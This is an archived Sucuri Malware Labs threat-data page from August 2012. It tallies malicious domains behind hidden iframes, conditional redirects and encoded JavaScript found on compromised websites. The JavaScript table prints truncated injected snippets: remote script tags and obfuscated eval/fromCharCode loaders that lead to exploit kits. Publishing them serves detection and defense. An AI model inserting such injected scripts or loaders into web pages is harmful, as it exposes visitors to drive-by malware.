Sucuri Malware Labs

Historic malware entries for 2012-08-06Home | Notes | Malware data | Signatures | Tools | About

Archived data: Latest | 2013-05-19 | 2013-05-15 | 2013-05-14 | 2013-05-13 | 2013-05-12 | 2013-05-07 | 2013-05-02 | 2013-05-01 | More days

We separate the data in three categories: Iframes, redirectiors and javascript. For each one you can click on the domain for more information, IP addresses and details on the malware.

Hidden iframes

Latest hidden iframes our scanner have identified on compromised web sites.

# of sites infected	Type	Malware / Domains
176	iframe	http://okaycontroller.info:8582/SDGwYC?SUmxv=18
73	iframe	http://interviewerbacklit.org/news.php?id=e6f6402caf60df3a
40	iframe	http://smuss.net/redirect.php
32	iframe	http://ineed.co.nz/adverts/media.php
21	iframe	http://unlinedrj.org/news.php?id=e6f6402caf60df3a
21	iframe	http://playart.org/sites/stats.php
18	iframe	http://arvaglobal.com/vwop.php
16	iframe	http://hazelwave.ru/in.cgi?16
13	iframe	http://whitecada.ru/in.cgi?16
11	iframe	http://shopicardcom1.ns1.name/main.php?page=0a5dfa49b8990c98
9	iframe	http://competechart.ru/in.cgi?16
8	iframe	http://blackium.ru/in.cgi?16
7	iframe	http://www.songsmusic.in/searchbar.html
6	iframe	http://methuenedge.com/stats.php
5	iframe	http://niu-sae.com/stats.php
4	iframe	http://simat.co.th/counter.php
3	iframe	http://tuneupyourday.com/css-kdg.php
3	iframe	http://torvaldscallthat.info/in.cgi?16
3	iframe	http://grabmale-junkert.de/c.php
3	iframe	http://bioperm12.org/20/go.php?sid=1
2	iframe	http://zumobtr.ru/gate.php?f=1036767
2	iframe	http://stds5.check-it-out.nl/in.cgi?13
2	iframe	http://gingertide.ru/in.cgi?15
2	iframe	http://buzzcluster.ru/in.cgi?16
1	iframe	http://purplebeetle.ru/in.cgi?16
1	iframe	http://kulycap.fr/63464443.html
1	iframe	http://jsbondgroup.com/60034443.html
1	iframe	http://insulinpumpstuff.com/14094443.html
1	iframe	http://greenpillar.ru/in.cgi?16
1	iframe	http://filmblips.com/70524443.html
1	iframe	http://divorzioonline.com/49964443.html
1	iframe	http://deepers.co.kr/28054443.html
1	iframe	http://coderoute.ru/in.cgi?16
		Limited view (40 rows)... Only the top entries being displayed.

Conditional redirections

Conditional redirections we have detected (based on user agents or referers).

# of sites infected	Type	Malware / Domains
114	redirections	http://online-fitnes.ru/milli?5
95	redirections	http://onlinefitnes.ru/milli?5
90	redirections	http://fitnes-global.ru/sorento?5
71	redirections	http://fitnes2014.ru/milli?5
61	redirections	http://topfitnes.ru/iskustve?5
50	redirections	http://2013-fitnes.ru/milli?5
48	redirections	http://2013fitnes.ru/milli?5
36	redirections	http://colceadem.ru/infinity?8
34	redirections	http://fitnes-2014.ru/milli?5
32	redirections	http://fitnes-online.ru/milli?5
30	redirections	http://2014-fitnes.ru/milli?5
29	redirections	http://centerfitnes.ru/sorento?5
25	redirections	http://2014fitnes.ru/milli?5
24	redirections	http://reltimes2013.ru/tujur?11
23	redirections	http://online-fitnes.ru/milli?5
23	redirections	http://1-reltime.ru/martinez?6
21	redirections	http://fitnes-global.ru/sorento?5
20	redirections	http://onlinefitnes.ru/milli?5
20	redirections	http://nashifitnes.ru/nonalco?5
20	redirections	http://fitnes-top.ru/iskustve?5
17	redirections	http://2012-verygoods.ru/in.cgi?11
17	redirections	http://2011-supas.ru/blackmuscat?4
15	redirections	http://fitnes2014.ru/milli?5
14	redirections	http://fitnestop.ru/iskustve?5
13	redirections	http://topfitnes.ru/iskustve?5
13	redirections	http://pasla-ghwoo.ru/rqpgfap?8
12	redirections	http://mediciron.ru/
11	redirections	http://miamiheattickets.com/http.php
11	redirections	http://2013fitnes.ru/milli?5
11	redirections	http://2013-fitnes.ru/milli?5
10	redirections	http://24medi.ru/timetose?19
8	redirections	http://fitnes-2014.ru/milli?5
7	redirections	http://fitnes-online.ru/milli?5
6	redirections	http://sanagater.ru/easy?9
6	redirections	http://freshinter.ru/in.cgi?8
6	redirections	http://colceadem.ru/infinity?8
6	redirections	http://centerfitnes.ru/sorento?5
6	redirections	http://2014-fitnes.ru/milli?5
5	redirections	http://stds5.check-it-out.nl/in.cgi?13
5	redirections	http://nasha-fitnes.ru/nonalco?5
		Limited view (40 rows)... Only the top entries being displayed.

Encoded javascript

Encoded javascript (redirecting to blackhole and other exploit kits) or to build a remote call.

# of sites infected	Type	Malware / Domains
35	javascript	<script>try{1-prototype;}catch(bsdtwbd){q=412;} if(020==0x10){f=[1,0,95,94,23,30,92,102,89,109,...
32	javascript	<script src="http://tartis78tscolla.rr.nu/sl.php"></script>
32	javascript	<script src="http://senior78custome.rr.nu/sl.php?v=1"></script>
30	javascript	<script src="http://andsto57cksstar.rr.nu/sl.php"></script>
27	javascript	<script src="http://xinthesidersdown.com/sl.php"></script>
25	javascript	<script type="text/javascript">document.write('<iframe src="http://ineed.co.nz/adverts/media.ph...
23	javascript	<script>i=0;if(window["document"])try{grbregd=prototype;}catch(z){h="Code";f=[9,18,315,102,64,1...
22	javascript	<scriptlanguage=JavaScript>document.write(<iframesrc=http://frankwsdoms.in/showads.php?2&seoref...
22	javascript	<script>if(window.document)aa=(Number+[].unshift).substr(0,4);aaa=([].sort+[]['sort']).substr(0...
18	javascript	<script>try{document.asd.removeChild({})}catch(q){ss="";s=String;}ddd=new Date();d2=new Date(dd...
18	javascript	<script language=javascript>status=location;document.write('<iframe src="http://arvaglobal.com/...
16	javascript	<script src="http://reque83ntlyin.rr.nu/sl.php?v=1"></script>
14	javascript	<script language="javascript" src="http://www.777seo.com/pop.php?username=empixcrew&max=5"></sc...
10	javascript	<script src="http://reque83ntlyin.rr.nu/sl.php"></script>
10	javascript	<script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt...
7	javascript	<script src="http://globalpoweringgathering.com/nl.php?p=1"></script>
6	javascript	<script type="text/javascript" src="http://asjo.com.br/js/Check.php"></script>
6	javascript	<script src="http://lasimp04risoned.rr.nu/sl.php"></script><!--AFMC">"></title><script src="htt...
6	javascript	<script>eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,108,106,115,40,41,123,116,11...
6	javascript	<script>d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try{Boolean(true).prototype.a}...
5	javascript	<script>try{n^=window["ev"+"al"];}catch(zxc){e=eval;n="143..120..1122..1404..1210..1188..1276.....
5	javascript	<script src="http://tartis78tscolla.rr.nu/sl.php?v=1"></script>
5	javascript	<script src="http://senior78custome.rr.nu/sl.php"></script>
4	javascript	<script src="http://eighbo02rsbarr.rr.nu/sl.php"></script>
3	javascript	<script type="text/javascript" src="http://aeg.com.br/us/Check.php"></script>
2	javascript	<script src="http://yea58rlay.rr.nu/pmg.php?d=x"></script>
2	javascript	<script>if(window["document"])try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-...
2	javascript	<script>if(window.document)aa=(Number+'evweds').substr(0,4);aaa=(Date.UTC+124).substr(0,4);if(a...
1	javascript	<script type="text/javascript" src="http://eumemo.com.br/010706.php"></script>
1	javascript	<script type="text/javascript" src="http://arbtoon.com/mltools.js"></script>
1	javascript	<script type="text/javascript">document.write(String.fromCharCode(60,105,102,114,97,109,101,32,...
1	javascript	<script>try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a...
1	javascript	<script>try{1-prototype;}catch(bsdtwbd){q=412;} if(020==0x10){f=[1,0,95,94,23,30,92,102,89,109,...
1	javascript	<script src=http://pomati.it/logs/java_zoom3.php ></script>
1	javascript	<script src=http://nexsales.com/v1/Contact_us.php ></script>
1	javascript	<script src="http://ids54enc.rr.nu/pmg.php?d=x"></script>
1	javascript	<script src="http://escale25sdesign.rr.nu/pmg.php?d=x"></script>
1	javascript	<script src="http://andsto57cksstar.rr.nu/sl.php?v=1"></script>
		Limited view (40 rows)... Only the top entries being displayed.